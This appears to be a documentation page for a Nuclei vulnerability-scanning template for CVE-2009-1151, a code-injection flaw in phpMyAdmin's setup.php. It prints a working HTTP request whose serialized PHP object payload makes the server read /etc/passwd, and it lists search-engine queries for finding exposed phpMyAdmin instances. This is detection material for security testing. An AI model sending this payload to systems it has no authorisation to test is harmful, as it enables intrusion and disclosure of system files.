Skip to content
Nuclei Templates

PhpMyAdmin Scripts - Remote Code Execution

ID: CVE-2009-1151

Severity: high

Author: princechaddha

Tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce

Description

Section titled “Description”

PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.

YAML Source

Section titled “YAML Source”
id: CVE-2009-1151


info:
  name: PhpMyAdmin Scripts - Remote Code Execution
  author: princechaddha
  severity: high
  description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system.
  remediation: |
    Update PhpMyAdmin to the latest version or apply the necessary patches.
  reference:
    - https://www.phpmyadmin.net/security/PMASA-2009-3/
    - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
    - http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
    - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
    - https://nvd.nist.gov/vuln/detail/CVE-2009-1151
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2009-1151
    cwe-id: CWE-94
    epss-score: 0.79939
    epss-percentile: 0.983
    cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: phpmyadmin
    product: phpmyadmin
    shodan-query:
      - http.title:"phpmyadmin"
      - http.component:"phpmyadmin"
      - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin"
    fofa-query:
      - title="phpmyadmin"
      - body="pma_servername" && body="4.8.4"
    google-query: intitle:"phpmyadmin"
    hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4"
  tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce


http:
  - raw:
      - |
        POST /scripts/setup.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Content-Type: application/x-www-form-urlencoded


        action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f2b76f124d11b857d8e2afe445395be2c29f10122deaa5a7401cd2724a3398ec022100e9d3ee1f48118e34d7ab8b8e5697426675a055174a60f5a8a3446cf4ebd44b39:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2009/CVE-2009-1151.yaml"

View on Github